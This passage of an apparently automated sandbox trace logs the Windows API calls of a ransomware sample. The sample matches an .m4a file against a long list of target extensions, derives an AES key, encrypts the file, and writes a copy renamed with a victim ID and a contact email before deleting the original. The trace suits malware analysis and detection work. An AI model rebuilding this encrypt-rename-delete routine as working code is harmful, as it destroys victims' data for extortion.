.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.689] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.689] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.689] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.695] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1560e, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x1560e, lpOverlapped=0x0) returned 1
	[0190.699] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.699] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0190.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.702] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0190.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.702] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.703] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9b30) returned 1
	[0190.703] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.703] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x1560e, dwBufLen=0x1560e | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x15610) returned 1
	[0190.706] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.706] RtlMoveMemory (in: Destination=0xff2798, Source=0xfdd180, Length=0x1560e | out: Destination=0xff2798) 
	[0190.706] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.706] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2798*, pdwDataLen=0x18bc0c*=0x1560e, dwBufLen=0x15610 | out: pbData=0xff2798*, pdwDataLen=0x18bc0c*=0x15610) returned 1
	[0190.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.708] CryptDestroyKey (hKey=0xfb9b30) returned 1
	[0190.709] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.709] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0190.709] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.709] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0190.709] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.709] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.710] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.710] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0190.711] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 85
	[0190.711] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.712] WriteFile (in: hFile=0x2c0, lpBuffer=0xff2798*, nNumberOfBytesToWrite=0x15610, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff2798*, lpNumberOfBytesWritten=0x18c068*=0x15610, lpOverlapped=0x0) returned 1
	[0190.718] CloseHandle (hObject=0x2c0) returned 1
	[0190.718] CloseHandle (hObject=0x384) returned 1
	[0190.718] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a")) returned 1
	[0190.728] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a")) returned 0
	[0190.728] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32459000, ftCreationTime.dwHighDateTime=0x1d96e7c, ftLastAccessTime.dwLowDateTime=0xbc6dc480, ftLastAccessTime.dwHighDateTime=0x1d9722f, ftLastWriteTime.dwLowDateTime=0xbc6dc480, ftLastWriteTime.dwHighDateTime=0x1d9722f, nFileSizeHigh=0x0, nFileSizeLow=0xd42f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_fZ9PZ08C.m4a", cAlternateFileName="Y_FZ9P~1.M4A")) returned 1
	[0190.729] lstrcmpW (lpString1="y_fZ9PZ08C.m4a", lpString2="..") returned 1
	[0190.729] lstrcmpW (lpString1="y_fZ9PZ08C.m4a", lpString2=".") returned 1
	[0190.729] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.729] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="y_fZ9PZ08C.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\y_fZ9PZ08C.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\y_fZ9PZ08C.m4a"
	[0190.729] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\y_fZ9PZ08C.m4a") returned 42
	[0190.729] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.729] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\y_fZ9PZ08C.m4a", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a") returned 0x2a
	[0190.730] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.730] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.730] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a"
	[0190.730] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a") returned 42
	[0190.730] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.730] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.730] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0190.731] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.731] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.